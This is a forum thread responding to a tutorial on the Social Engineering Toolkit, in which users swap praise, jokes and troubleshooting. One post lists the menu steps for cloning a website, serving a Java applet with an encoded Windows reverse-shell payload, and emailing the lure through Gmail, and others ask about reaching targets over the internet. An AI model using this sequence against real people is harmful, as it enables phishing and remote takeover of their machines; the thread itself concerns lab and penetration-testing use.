The Social Engineering Toolkit: Creating Fake Web Sites to Own Boxes

[chap0]

pureh@te really appreciate the share of the write up

ReL1k probably doesn't need the job. You might wanna check his bio out.

WOW on this bio

[relik]

Hehe, thanks guys for all the kind words ;-) Let me know if you need anything added!

-ReL

[theprez98]

Hehe, thanks guys for all the kind words ;-) Let me know if you need anything added!

-ReL

www.sacmaniac.com is still available... ;-)

[fddi_sent]

www.sacmaniac.com is still available... ;-)

I think you meant SecManiac.com Blog - Comments on Building one badarse CUDA Cracking Server!

[purehate]

No we meant sacmaniac. If you were not at shmoocon you will need to watch Rel1ks fireside talk to get the joke.

[seanile]

hi
I have had this working and gained full access to my XP sp2 box just great.
Tried to do it again many times - wont work this is what I am doing.:-
./set
select - 2 website vectors
select - 2 clone and setup fake website
select - 1 Java applet attack method
enter url www.etcetc.co
returns Payload name 98iywQNlF.exe (this time -diff each try)
select - 1 Windows Shell reverse TCP
select - 2 shikata_ga_nai
2 times
enter port 55555
linux/OSX = no
select - 1 single Email address
select - 1 Gmail
now it sends email and MSF fires up
started reverse handler on 192.168.1.3:55555 etc
Now on XP box firfox browser
email to my hotmail account recieved OK
enter http://192.168.1.3:55555
back in MSF = coomand shell session 1 opened (192.168.1.3:55555 -> 192.168.1.10:3547)
meantime XP browser waiting for 192.168.1.3
msf enter sessions -i 1 shows several lines and hangs in cookie list
have to abort the session.

in the BT4 /site/template directory the files index.html is the cloned website, and also the 98iywQNlF.exe file
any ideas please as it has worked the once only
many thanks

[theyhadsaid]

REL1K: where can I find the source code of Java.class? I am not good at Java so decompiling is not useful to me. I just want to change the name of the Java Applet but I can't because SET comes with a pre-compiled class. Thanks..

[HAL9000]

Great tutorial!!!!

I tried it in VMware between an XP SP2 and BT4 and seems to work....
Anyway, if I need to work outside my local LAN I need to modify the router settings as the LHOST shoud not be 192.168.x.x but instead a public IP address.
Do you know what kind of router setting I need to do?

Thanks,

[Utram]

Good post, what an excellent time-saving App.

I'm considering implementing the email aspect of this program into a pentest. But it doesn't bind when i type in my public IP, or will it automatically do that? This will be done through WAN so I'm going with the assumption that typing in only my local IP address will be insufficient.

[purehate]

When working with public IPs you need to make sure of a few things:
A. You have permission from the ISP (They tend to frown on public exploitation)
B. The port is properly forwarded from you router or gateway device to your attacking machine